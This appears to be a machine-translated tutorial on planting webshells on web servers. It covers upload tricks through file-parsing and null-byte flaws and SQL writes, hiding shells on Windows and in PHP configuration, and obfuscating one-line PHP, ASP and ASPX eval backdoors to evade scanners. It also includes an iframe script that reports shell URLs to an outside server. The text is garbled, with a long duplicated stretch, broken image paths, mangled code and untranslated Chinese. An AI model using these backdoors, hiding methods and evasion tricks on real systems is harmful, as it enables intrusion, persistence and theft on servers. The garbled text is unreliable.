1. What is webshell
- Introduction to webshell
webshell, as the name suggests: web refers to the web server, and shell is a script program written in scripting language. Webshell is a management tool for the web, which can control the web The authority to operate the server, also called webadmin. Webshell is generally used by website administrators for website management, server management, etc. However, because webshell is relatively powerful, it can upload and download files, view databases, and even call some system-related commands on the server (such as creating users, Modify or delete files, etc.), usually used by hackers. Hackers use some upload methods to upload the webshell they wrote to the directory of the web server page, and then intrude through page access, or connect to the local computer by inserting a sentence Some related tools directly perform intrusion operations on the server.
- Classification of webshell
Default
9
10
| 12
13
14
15
16
17
18
form action = http
://host path/TEXT.asp method=post>
textarea name= | value cols = 120rows=10wid th=45> set lP=server.createObject("Adodb.Stream ")//Create stream object lP.Open//OpenlP.Type=2 //In text mode lP.CharSet="gb2312" //Font standardlP.writetext request( "newvalue" ) lP.SaveToFile server.mappath("newmm.asp"),2//Write the Trojan content to newmm.asp by overwriting the file, 2 is the overwritten one Method lP. Close//Close the object set lP=nothing//Release object response.redirect"newmm.asp"//redirect to newmm.asp < ;/textarea> textarea name=newvalue cols=120rows=10width=45> (Add content to generate Trojan) /textarea> BR > center> ; br> input type=submit value=submit> |
Da Ma’s working mode is much simpler. There is no difference between the client and the server. Some script experts directly integrated the server side of the one-sentence Trojan, uploaded Da Ma through the upload vulnerability, and then copied the big horse. The horse's URL address is directly accessed to perform penetration work on the web server on the page. However, some websites have strict restrictions on uploading files. Because DaMa has many functions, the size is relatively large, which may exceed the upload limit of the website. However, the size of DaMa can be controlled (for example, copy the code many times, Or insert the code into a garbled file), but Xiaoma's operation is more cumbersome. You can first upload Xiaoma to get the webshell, and then upload Xiaoma to get the server through Xiaoma's connection.
2. How to upload webshell
1. Upload analysis vulnerability
(1)iis directory parsing vulnerability
(2) File parsing vulnerability
For example: xx.asp;.jpg. When the web page is uploaded, the jpg file is recognized, but iis will not parse it after uploading; subsequent characters will also parse the file into an asp file. This vulnerability exists in iis5.x/6.0 versions.
(3) File name analysisFor example: xx.cer/xx.cdx/xx.asa. Under iis6.0, cer files, cdx files, and asa files will be treated as executable files, and the asp code inside will also be executed. (The asa file is an asp-specific configuration file, and cer is the certificate file). (4)fast-CGI parsing vulnerability
When the web server turns on fast-CGI, upload the image xx.jpg. The content is:
Default
1
fputs(fopen('shell.php', 'w' ),'eval($_POST[shell])?>');?>
The fput used here creates a shell.php file and writes a sentence. Accessing the path xx.jpg/.php will generate a one-sentence Trojan shell.php in this path. This vulnerability exists in IIS 7.0/7.5 and Nginx versions below 8.03. Locale: PHP, prel, Bourne Shell, C and other languages.
*Note: fast-CGI is an upgraded version of CGI. CGI refers to an interface that provides human-computer interaction on the server. fast-CGI is a resident CGI. Because CGI needs to use fork to start a process every time it is executed, but fast-CGI is always executed after activation, and there is no need to fork a process for every request. It takes up less memory than ordinary CGI. (5) Apache parsing vulnerabilityThe way Apache parses is from right to left. If the parsing cannot be successful, it will want to move one to the left. However, background upload usually looks at the rightmost suffix of the uploaded file, so according to For this, you can name the horse xx.php.rar, because apache cannot parse rar, so it parses it as php, but the background upload point parses it as rar, thus bypassing the upload file suffix restriction 2. Truncate the upload
When uploading a picture, for example, name it 1.asp .jpg (there is a space after asp). When uploading, use NC or burpsuite to capture the form, and add %00 after the upload name asp (in burpsuite You can directly edit the HEX value in it. The HEX value of a space is 20. Change 20 to 00). If HEX is 00, it means truncation, and 20 means a space. If it means truncation, it means ignoring the JPG verification statement in the script and directly Upload ASP. 3. Backend database backup
In the backend management system of some enterprises, there is a function to back up the database (for example, Southern CMS has the function to back up the database). You can upload a picture that contains a Trojan sentence, or change it to jpg format, and then use the database backup function to back up the picture to asp and other content that can be parsed into script statement format, and then passed Trojans can be executed by accessing the web, but this method is very old. Now most cms have canceled or disabled this backup function. 4. Use database statements to upload
(1) mysql database into outfile
The premise of this method must be that the website has a corresponding injection point, and the current user must have upload permission, and there must be a current web page in The absolute path under the server. The method is to use joint query to import the one-sentence Trojan into a PHP file under the website, and then use the server to connect to the website. However, the conditions for the above method are too harsh and are rarely encountered. (2) Create a new table writing Trojan Some open source cms or self-made webshells will have database management functions. There are sql query functions in the database management functions. First use create table shell (codetext); create a name called shell The table contains a list called code and the type is text. Then use insert into shell(code) values('one sentence horse'). Here, the code column in the shell table is assigned the value of one sentence horse, and then through custom backup, back up the table as x.php;x and then It is parsed into php and then executed. This is not x.php; x must be parsed into php. Different web servers have different service programs and different filtering rules. Other methods may be used. (3)phpMyadmin setting errorphpMyadmin is a tool used to manage website databases, in which config.inc.php is its configuration file. When viewing the file, if $cfg['Servers'][$i ]['auth_type'] The value setting of the parameter is not set (the default is config), which means that no corresponding verification is done when logging in to the database. You can directly connect to the database, and in some versions of Mysql, the default login is as the root user. Log in (i.e. administrator), so logging in has the maximum authority. However, root can generally only log in locally, so a remote login user must be created. After logging in as a remote login user, create a table and then write the one-sentence Trojan into it. 3. The "security" of webshell
1. Regarding the hiding of webshell
When uploading webshell, you must hide the webshell. The first purpose of hiding the webshell is to prevent the website administrator from discovering it and deleting it. The second purpose is to prevent other hackers from discovering this file and using it. (1) Malaysia’s hidden
①Undead zombies
Windows system has system reserved folder names. Windows does not allow these names to be used to name folders. Reserved folders: aux|prn|con|nul|com1|com2 |com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. But these can be created using the windows copy command, such as:
Default
1
c:>copy3.asp.C:aux.asp
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png
file:///C:UsersSAKAIY~1 AppDataLocalTempmsohtmlclip11clip_image022.jpgcreated in c drive an aux.asp. This file cannot be deleted in the graphical interface. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.pngTo delete, you must use the del command. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.pngThere is no prompt after deletion, but the file is indeed gone. Of course, although this method can be used to create a webshell that cannot be deleted through the graphical interface, if it is placed directly in the root directory of the web page, it will still be deleted if an experienced network administrator sees it. ②clsid hidden
Every program in windows has a clsid. If you name a folder x.{program clsid}, then enter two commands: file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026. jpgAfter creationfile:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.png
click to enter the control panel, but in fact the file is still a folder, and Malaysia still exists in it, and create a Naming such a folder with a clsid as a corresponding program can confuse network administrators. For example, enter the recycle bin folder to create such a folder with a recycle bin clsid, and copy a reserved word in it. asp, you can also use
Default
1
attrib+ h+s+r+d/s/d
Modify the properties of the file and hide it. Generally, Windows does not display hidden files by default, and the recycle bin folder is automatically created, so that an immortal webshell can be hidden in the server.
③Drive hiding technology
The principle is that in the Windows file system, when a folder is opened, the system will send an IRP_MJ_DIRECTORY_CONTROL function. This function can allocate a buffer to traverse the subfolders under the folder. The obtained information is stored in the buffer. When traversing, it looks for matching file names. If the file names match, the current folder or file is bypassed. Regarding the principle of bypass, I queried the code. According to my understanding, It adds the offset of the file based on the traversed pointer when querying the target file, and skips directly without scanning the target folder. For the implementation of this technology, although there are many C source codes on the Internet, it is difficult to operate because of the support of header files and system support (the file systems of different systems will be different). I found Easy on the Internet The File Locker program needs to be installed on the web server and set permissions on the target file.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
Permission settings include readable, writable, deletable, and visible.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg
You can see from the above picture that we have hidden it. As mentioned above, because the traversal is directly bypassed, the absolute path can be accessed. My understanding is:
Default
WINDOWS
xlkfs
.dat
c:
WINDOWS
xlkfs.dllc:WIND OWS
xlkfs.ini c:WINDOWS
system32driversxlkfs.sys
These 4 files replace traversal Query, to access hidden files, entering the absolute path does not apply absolute path query, but queries through the above four files, which is equivalent to making a separate driver for hidden files.
In order not to be discovered by the administrator, you can delete the Easy FileLocker program, but you cannot delete the above 4 files. After deleting the program, you can still access it by entering the absolute path, which achieves the function of hiding the backdoor④Registry hidingRegistry path: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer\AdvancedFolderHiddenSHOWALLThere is a CheckedValue key under this path, put it Change it to 0. If there is no CheckValue key, create one directly and assign it a value of 0. Then the created hidden files will be completely hidden. Even if "Show all files" is turned on under the folder options, it will not be displayed. (2) Hiding of one-sentence Trojans①Header file inclusion hiding
In some script files in the web, some files have include statements. You can use this inclusion method to include one-sentence files. When accessing this page These sentences will be called directly. asp includes the statement: , fill in the path directly, and the file path is the path on the web server.
You can use Webmaster Stop to write a sentence of NTFS stream pony into the image. After writing the ‘’ to ‘:’ in the path, the image will not be displayed, and then find
Go to an asp file on the web server and write an include statement at the beginning of the file, php include statement:
Default
1
include($include
);?>
$include here can be an external path such as:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php
This aaa The content of 1.php on is
Default
1
include($include);?>
means inclusion. bbb is an external server, provided that this server cannot support PHP. Otherwise, hehe.php (that is, one sentence horse) will be executed on the bbb server, but aaa will not be executed.
②Configuration file hidden sentence (PHP)
After getting the PHP webshell, you can use php.ini to hide files and edit configuration files. One of the functions is to add the contents of a certain file to any interface. Header and footer: auto_prepend_file =hehe.phpThen look at include_path = “E:PHPnow-1.5.6htdocs;”This configuration information indicates the location of the collection where the header and footer are loaded, path The rule is "path1;path2", which means adding the header and footer files in the folder of path1 to the files in path, because here is a '.' indicating the root path, which is equivalent to adding it to the homepage. Go there, and then write a sentence in the hehe.asp file, you can add the header function through php and write the sentence into the homepage of the website. ③404 Pony
404 Pony displays a 404 page that does not exist when accessing, but in fact the Trojan code has been executed. Generally, it can be called out by pressing shift 5 times. 4. One sentence about webshell to avoid killing
1. Construction method to bypass detection (PHP)
General detection programs will filter characters like "_POST", "system", "call_user_func_array", this Sometimes you can use construction methods to bypass some detection programs. The basic principle is that each character in PHP corresponds to a binary value. You can use the XOR method to make one character in the horse use the XOR value of two characters. to replace. For example, like the code
Default
@ +$ _ ++
; // Here ++ let '_' 自 1 $ __ = ( "#" ^ "|"
) ;
$__=("/"^"`");
$__= ("|"^"/"); "{"^"/" );
Then the structure and a sentence can be written as
Default
@$_
++;
$__=
("#"^
"|").("." ^"~").("/"^"`"
).("|"^"/").("{"^ "/"); // The value of $__ is _POST @${$__}[!$_](${$__}[$_]); ?> ;
//The result is @$_POST[0]($POST[ 1])!$_ represents the opposite of 1. In the language, 1 represents true, and the converse is 0 (false)But this bypass method is quite weak. If you think about it carefully, even if it is two characters Binary values are "~").("/"^"`").("|"^"/").("{"^"/")1 $__=(
"#"^ "|" ).
("."^"~")
.
("/"^"`" ).("|"^"/"
).("{"^"/"
)
The binary value of
will be detected twice. The value of the hexadecimal code will still be Kill. 2. Regular expression replacement method (PHP) There is a function preg_replace() in php, which can realize the replacement of regular expressions. Using substitution to bypass the detection system also requires a function feature in the PHP scripting language. When the function is called, if the value assigned to the formal parameter in the function contains a command, the command will be executed. Default(.+?)/ies",'funfunc("1")', $_POST["cmd"]);
?>1234
function funfunc
($str){
}
echopreg_replace("/
(.+?) /ies",'funfunc("1")',$_POST
["cmd"
]);
?>
The above code is a process of replacement. First, create an empty function, and then use the preg_replace function to replace the
{${phpinfo()}}
(of course the phpinfo() here can be replaced with other commands), through replacement, it will become Into funfunc({${phpinfo()}})Since ${} can parse the content in {}, the phpinfo here can be executed smoothly. 3. Instant generation method (PHP)
When using header file inclusion, the included header file php is easily scanned by the scanner. At this time, you can use file_put_content to create a file with a sentence like php written in it. . Generate the horse before accessing it, but this function is sensitive and can be easily killed. 4. Avoidance method (asp)
Because some asp servers will filter in order to prevent one-line spam, you can use:
Default
1
scriptlanguage=VBScriptrunat =server> execute request("cmd")/Script>
The functions are the same, Just change the form. Avoid specific script language: aspx one sentence
Default
1
<script>language<span>=<span>"C#"<span><span>runat <span>=<span>"server"<span>><span> WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>; <span></script>
这里使用C#语言写一句话马。5.拆分法(asp)
将拆分为,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。还有拆分法加强版:
Default
12
IfRequest("MH")""ThenExecute(Request("MH"))%>
ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。6.乱码变形(ANSI->Unicode加密)
Default
1
evalrequest("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”
Default
1
eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为
Default
1
eval(eval(request("brute"))%>
7. Malaysia’s anti-virus protection
(1) base4code encoding
Malaysia’s anti-virus protection can be compressed by compressing the Malaysian code, and then perform the base4 encryption algorithm after compression, and then add the Malaysian code at the end Add
Default
1
@eval(gzinflate (base64_decode($code)));
You can execute the script. Among them, the $code variable is used to store the base4 code. During execution, it is first decompressed by gzinflate and executed in eval. In fact, this cannot be truly protected from killing, as base4code and eval are still included in the signature list, and will also be killed when passing through the scanner. (2) ROT13 encoding (php)
str_rot13 is a function used by php for encoding. It can be used to encode script code to bypass signature detection, for example. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image031.pngThe strrev function in the picture is used to reverse characters. In order to escape the detection of the signature, the characters are specially separated with '.' signs. The characters encrypted by the three str_rot13 in the picture are gzinflate, str_rot13, base64_decode in order, which is equivalent to triple encryption, and also avoids the two feature codes of gzinflate and base64_decode. But there is no avoiding str_rot13. It is possible that some anti-virus software will also use str_rot13 as a feature code. ROT13 becomes rotation 13, which means that the current character’s position value in the alphabet minus 13 is encrypted. Encrypt it twice and it will return to its original value. However, due to the fixed algorithm, the encryption strength is not strong. And the method of cracking is extremely simple, just encrypt one side. (3) Other encodings
Generally, anti-virus software and scanners will use signature codes to determine whether there are viruses. When doing anti-virus processing for Malaysian or small horses, or in one sentence, php or asp scripts are usually used. Encryption functions can be used to bypass scanners (such as base4, rot13, etc.), but I think you can write your own encryption algorithm, and then use your own encryption algorithm to encrypt script code to bypass some feature codes. You can use some ideas of encryption methods such as Caesar cipher and shift encryption, write an encryption algorithm, and then encrypt the script code. Then feature codes such as base4 and rot3 will disappear, or you can use homemade encryption directly without any trouble. The algorithm encrypts the signature and then decrypts it when used. You can also use key encryption algorithms such as DES and RSA. Generally, Malaysia will have a password login box. You can link the password of the login script with the decryption key, and it can be parsed only after entering the correct password. , on the one hand, it is to avoid detection by scanners and anti-virus software, and on the other hand, it is convenient. Even if this Malaysia is obtained by others, they cannot decrypt it and see the source code. 5. About the backdoor of webshell
Generally, the Malaysian downloaded online will have more or less backdoors. These backdoors directly lead to the website we downloaded being taken away by others, so the Malaysian downloaded online must first Check for backdoors. For example, the universal password here:
Default
1234567
end function
ifsession ( "hehe") ""then
ifrequest.form("pass")=userpassor request.form ("pass")
= "1111111" hThensession ( "hehe" ) = UserPassSS response.redirect urlelse
here
Default
1
request.form ("pass")=userpass
was originally used to verify the value of pass. If the entered pass value is equal to userpass, it means Verification is successful, but later
Default
1
orrequest. from(“pass”)=”1111111”
means if the entered pass value is 111111 1. You can also log in to Malaysia. Of course, this place can't be that simple. The original author can assign the userpass value to two and add one
The trigger condition for userpass change is triggered when he logs in (for example, if the login fails, the update of userpass value will be triggered), so that you can add a suffix, and
Moreover, the trigger condition code and the verification code are far apart and difficult to find. At this time, we need to analyze the Malaysian code line by line.
Then use the frame to mount the horse:
Default
1
iframe src=backdoor addresswidth=0height=0>/iframe >
In this place, set the link address width and height to 0, and the page will be hidden. The "backdoor address" inside points to your own script receiver, and finally you put the receiving script on a public network server you built. The receiving script is as follows:
Default
url
=Request .ServerVariables
("HTTP_Referer")setfs
=server.
CreateObject ("Scripting.FileSystemObject") setfile
=fs.OpenTextFile(server.MapPath("hehe.txt") ,8,True)
file.writelineurl file.closeset file=nothing
setfs=nothing
%>
where
Default
1
url=Request .ServerVariables("HTTP_Referer")
represents the requested character to the content, that is, the Malaysian url address, and then The url address is saved to the current hehe.txt of the directory.
To propose this kind of backdoor, you must first destroy the second type of password authentication in Malaysia, which is the master password. Delete the relevant function code, and then check to see if there is an ASP Malaysia page with a hidden URL such as width=0 height=0, find it and delete it.
The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
(4)fast-CGI parsing vulnerability
When the web server turns on fast-CGI, upload the image xx.jpg. The content is:
Default
1
fputs(fopen('shell.php', 'w' ),'eval($_POST[shell])?>');?>
The fput used here creates a shell.php file and writes a sentence. Accessing the path xx.jpg/.php will generate a one-sentence Trojan shell.php in this path. This vulnerability exists in IIS 7.0/7.5 and Nginx versions below 8.03. Locale: PHP, prel, Bourne Shell, C and other languages.
*Note: fast-CGI is an upgraded version of CGI. CGI refers to an interface that provides human-computer interaction on the server. fast-CGI is a resident CGI. Because CGI needs to use fork to start a process every time it is executed, but fast-CGI is always executed after activation, and there is no need to fork a process for every request. It takes up less memory than ordinary CGI. (5) Apache parsing vulnerabilityThe way Apache parses is from right to left. If the parsing cannot be successful, it will want to move one to the left. However, background upload usually looks at the rightmost suffix of the uploaded file, so according to For this, you can name the horse xx.php.rar, because apache cannot parse rar, so it parses it as php, but the background upload point parses it as rar, thus bypassing the upload file suffix restriction 2. Truncate the upload
When uploading a picture, for example, name it 1.asp .jpg (there is a space after asp). When uploading, use NC or burpsuite to capture the form, and add %00 after the upload name asp (in burpsuite You can directly edit the HEX value in it. The HEX value of a space is 20. Change 20 to 00). If HEX is 00, it means truncation, and 20 means a space. If it means truncation, it means ignoring the JPG verification statement in the script and directly Upload ASP. 3. Backend database backup
In the backend management system of some enterprises, there is a function to back up the database (for example, Southern CMS has the function to back up the database). You can upload a picture that contains a Trojan sentence, or change it to jpg format, and then use the database backup function to back up the picture to asp and other content that can be parsed into script statement format, and then passed Trojans can be executed by accessing the web, but this method is very old. Now most cms have canceled or disabled this backup function. 4. Use database statements to upload
(1) mysql database into outfile
The premise of this method must be that the website has a corresponding injection point, and the current user must have upload permission, and there must be a current web page in The absolute path under the server. The method is to use joint query to import the one-sentence Trojan into a PHP file under the website, and then use the server to connect to the website. However, the conditions for the above method are too harsh and are rarely encountered. (2) Create a new table writing Trojan Some open source cms or self-made webshells will have database management functions. There are sql query functions in the database management functions. First use create table shell (codetext); create a name called shell The table contains a list called code and the type is text. Then use insert into shell(code) values('one sentence horse'). Here, the code column in the shell table is assigned the value of one sentence horse, and then through custom backup, back up the table as x.php;x and then It is parsed into php and then executed. This is not x.php; x must be parsed into php. Different web servers have different service programs and different filtering rules. Other methods may be used. (3)phpMyadmin setting errorphpMyadmin is a tool used to manage website databases, in which config.inc.php is its configuration file. When viewing the file, if $cfg['Servers'][$i ]['auth_type'] The value setting of the parameter is not set (the default is config), which means that no corresponding verification is done when logging in to the database. You can directly connect to the database, and in some versions of Mysql, the default login is as the root user. Log in (i.e. administrator), so logging in has the maximum authority. However, root can generally only log in locally, so a remote login user must be created. After logging in as a remote login user, create a table and then write the one-sentence Trojan into it. 3. The "security" of webshell
1. Regarding the hiding of webshell
When uploading webshell, you must hide the webshell. The first purpose of hiding the webshell is to prevent the website administrator from discovering it and deleting it. The second purpose is to prevent other hackers from discovering this file and using it. (1) Malaysia’s hidden
①Undead zombies
Windows system has system reserved folder names. Windows does not allow these names to be used to name folders. Reserved folders: aux|prn|con|nul|com1|com2 |com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. But these can be created using the windows copy command, such as:
Default
1
c:>copy3.asp.C:aux.asp
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png
file:///C:UsersSAKAIY~1 AppDataLocalTempmsohtmlclip11clip_image022.jpgcreated in c drive an aux.asp. This file cannot be deleted in the graphical interface. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.pngTo delete, you must use the del command. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.pngThere is no prompt after deletion, but the file is indeed gone. Of course, although this method can be used to create a webshell that cannot be deleted through the graphical interface, if it is placed directly in the root directory of the web page, it will still be deleted if an experienced network administrator sees it. ②clsid hidden
Every program in windows has a clsid. If you name a folder x.{program clsid}, then enter two commands: file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026. jpgAfter creationfile:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.png
click to enter the control panel, but in fact the file is still a folder, and Malaysia still exists in it, and create a Naming such a folder with a clsid as a corresponding program can confuse network administrators. For example, enter the recycle bin folder to create such a folder with a recycle bin clsid, and copy a reserved word in it. asp, you can also use
Default
1
attrib+ h+s+r+d/s/d
Modify the properties of the file and hide it. Generally, Windows does not display hidden files by default, and the recycle bin folder is automatically created, so that an immortal webshell can be hidden in the server.
③Drive hiding technology
The principle is that in the Windows file system, when a folder is opened, the system will send an IRP_MJ_DIRECTORY_CONTROL function. This function can allocate a buffer to traverse the subfolders under the folder. The obtained information is stored in the buffer. When traversing, it looks for matching file names. If the file names match, the current folder or file is bypassed. Regarding the principle of bypass, I queried the code. According to my understanding, It adds the offset of the file based on the traversed pointer when querying the target file, and skips directly without scanning the target folder. For the implementation of this technology, although there are many C source codes on the Internet, it is difficult to operate because of the support of header files and system support (the file systems of different systems will be different). I found Easy on the Internet The File Locker program needs to be installed on the web server and set permissions on the target file.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
Permission settings include readable, writable, deletable, and visible.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg
You can see from the above picture that we have hidden it. As mentioned above, because the traversal is directly bypassed, the absolute path can be accessed. My understanding is:
Default
WINDOWS
xlkfs
.dat
c:
WINDOWS
xlkfs.dllc:WIND OWS
xlkfs.ini c:WINDOWS
system32driversxlkfs.sys
These 4 files replace traversal Query, to access hidden files, entering the absolute path does not apply absolute path query, but queries through the above four files, which is equivalent to making a separate driver for hidden files.
In order not to be discovered by the administrator, you can delete the Easy FileLocker program, but you cannot delete the above 4 files. After deleting the program, you can still access it by entering the absolute path, which achieves the function of hiding the backdoor④Registry hidingRegistry path: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer\AdvancedFolderHiddenSHOWALLThere is a CheckedValue key under this path, put it Change it to 0. If there is no CheckValue key, create one directly and assign it a value of 0. Then the created hidden files will be completely hidden. Even if "Show all files" is turned on under the folder options, it will not be displayed. (2) Hiding of one-sentence Trojans①Header file inclusion hiding
In some script files in the web, some files have include statements. You can use this inclusion method to include one-sentence files. When accessing this page These sentences will be called directly. asp includes the statement: , fill in the path directly, and the file path is the path on the web server.
You can use Webmaster Stop to write a sentence of NTFS stream pony into the image. After writing the ‘’ to ‘:’ in the path, the image will not be displayed, and then find
Go to an asp file on the web server and write an include statement at the beginning of the file, php include statement:
Default
1
include($include
);?>
$include here can be an external path such as:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php
This aaa The content of 1.php on is
Default
1
include($include);?>
means inclusion. bbb is an external server, provided that this server cannot support PHP. Otherwise, hehe.php (that is, one sentence horse) will be executed on the bbb server, but aaa will not be executed.
②Configuration file hidden sentence (PHP)
After getting the PHP webshell, you can use php.ini to hide files and edit configuration files. One of the functions is to add the contents of a certain file to any interface. Header and footer: auto_prepend_file =hehe.phpThen look at include_path = “E:PHPnow-1.5.6htdocs;”This configuration information indicates the location of the collection where the header and footer are loaded, path The rule is "path1;path2", which means adding the header and footer files in the folder of path1 to the files in path, because here is a '.' indicating the root path, which is equivalent to adding it to the homepage. Go there, and then write a sentence in the hehe.asp file, you can add the header function through php and write the sentence into the homepage of the website. ③404 Pony
404 Pony displays a 404 page that does not exist when accessing, but in fact the Trojan code has been executed. Generally, it can be called out by pressing shift 5 times. 4. One sentence about webshell to avoid killing
1. Construction method to bypass detection (PHP)
General detection programs will filter characters like "_POST", "system", "call_user_func_array", this Sometimes you can use construction methods to bypass some detection programs. The basic principle is that each character in PHP corresponds to a binary value. You can use the XOR method to make one character in the horse use the XOR value of two characters. to replace. For example, like the code
Default
@ +$ _ ++
; // Here ++ let '_' 自 1 $ __ = ( "#" ^ "|"
) ;
$__=("/"^"`");
$__= ("|"^"/"); "{"^"/" );
Then the structure and a sentence can be written as
Default
@$_
++;
$__=
("#"^
"|").("." ^"~").("/"^"`"
).("|"^"/").("{"^ "/"); // The value of $__ is _POST @${$__}[!$_](${$__}[$_]); ?> ;
//The result is @$_POST[0]($POST[ 1])!$_ represents the opposite of 1. In the language, 1 represents true, and the converse is 0 (false)But this bypass method is quite weak. If you think about it carefully, even if it is two characters Binary values are "~").("/"^"`").("|"^"/").("{"^"/")1 $__=(
"#"^ "|" ).
("."^"~")
.
("/"^"`" ).("|"^"/"
).("{"^"/"
)
The binary value of
will be detected twice. The value of the hexadecimal code will still be Kill. 2. Regular expression replacement method (PHP) There is a function preg_replace() in php, which can realize the replacement of regular expressions. Using substitution to bypass the detection system also requires a function feature in the PHP scripting language. When the function is called, if the value assigned to the formal parameter in the function contains a command, the command will be executed. Default(.+?)/ies",'funfunc("1")', $_POST["cmd"]);
?>1234
function funfunc
($str){
}
echopreg_replace("/
(.+?) /ies",'funfunc("1")',$_POST
["cmd"
]);
?>
The above code is a process of replacement. First, create an empty function, and then use the preg_replace function to replace the
{${phpinfo()}}
(of course the phpinfo() here can be replaced with other commands), through replacement, it will become Into funfunc({${phpinfo()}})Since ${} can parse the content in {}, the phpinfo here can be executed smoothly. 3. Instant generation method (PHP)
When using header file inclusion, the included header file php is easily scanned by the scanner. At this time, you can use file_put_content to create a file with a sentence like php written in it. . Generate the horse before accessing it, but this function is sensitive and can be easily killed. 4. Avoidance method (asp)
Because some asp servers will filter in order to prevent one-line spam, you can use:
Default
1
scriptlanguage=VBScriptrunat =server> execute request("cmd")/Script>
The functions are the same, Just change the form. Avoid specific script language: aspx one sentence
Default
1
<script>language<span>=<span>"C#"<span><span>runat <span>=<span>"server"<span>><span> WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>; <span></script>
这里使用C#语言写一句话马。5.拆分法(asp)
将拆分为,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。还有拆分法加强版:
Default
12
IfRequest("MH")""ThenExecute(Request("MH"))%>
ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。6.乱码变形(ANSI->Unicode加密)
Default
1
evalrequest("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”
Default
1
eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为
Default
1
eval(eval(request("brute"))%>
7. Malaysia’s anti-virus protection
(1) base4code encoding
Malaysia’s anti-virus protection can be compressed by compressing the Malaysian code, and then perform the base4 encryption algorithm after compression, and then add the Malaysian code at the end Add
Default
1
@eval(gzinflate (base64_decode($code)));
You can execute the script. Among them, the $code variable is used to store the base4 code. During execution, it is first decompressed by gzinflate and executed in eval. In fact, this cannot be truly protected from killing, as base4code and eval are still included in the signature list, and will also be killed when passing through the scanner. (2) ROT13 encoding (php)
str_rot13 is a function used by php for encoding. It can be used to encode script code to bypass signature detection, for example. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image031.pngThe strrev function in the picture is used to reverse characters. In order to escape the detection of the signature, the characters are specially separated with '.' signs. The characters encrypted by the three str_rot13 in the picture are gzinflate, str_rot13, base64_decode in order, which is equivalent to triple encryption, and also avoids the two feature codes of gzinflate and base64_decode. But there is no avoiding str_rot13. It is possible that some anti-virus software will also use str_rot13 as a feature code. ROT13 becomes rotation 13, which means that the current character’s position value in the alphabet minus 13 is encrypted. Encrypt it twice and it will return to its original value. However, due to the fixed algorithm, the encryption strength is not strong. And the method of cracking is extremely simple, just encrypt one side. (3) Other encodings
Generally, anti-virus software and scanners will use signature codes to determine whether there are viruses. When doing anti-virus processing for Malaysian or small horses, or in one sentence, php or asp scripts are usually used. Encryption functions can be used to bypass scanners (such as base4, rot13, etc.), but I think you can write your own encryption algorithm, and then use your own encryption algorithm to encrypt script code to bypass some feature codes. You can use some ideas of encryption methods such as Caesar cipher and shift encryption, write an encryption algorithm, and then encrypt the script code. Then feature codes such as base4 and rot3 will disappear, or you can use homemade encryption directly without any trouble. The algorithm encrypts the signature and then decrypts it when used. You can also use key encryption algorithms such as DES and RSA. Generally, Malaysia will have a password login box. You can link the password of the login script with the decryption key, and it can be parsed only after entering the correct password. , on the one hand, it is to avoid detection by scanners and anti-virus software, and on the other hand, it is convenient. Even if this Malaysia is obtained by others, they cannot decrypt it and see the source code. 5. About the backdoor of webshell
Generally, the Malaysian downloaded online will have more or less backdoors. These backdoors directly lead to the website we downloaded being taken away by others, so the Malaysian downloaded online must first Check for backdoors. For example, the universal password here:
Default
1234567
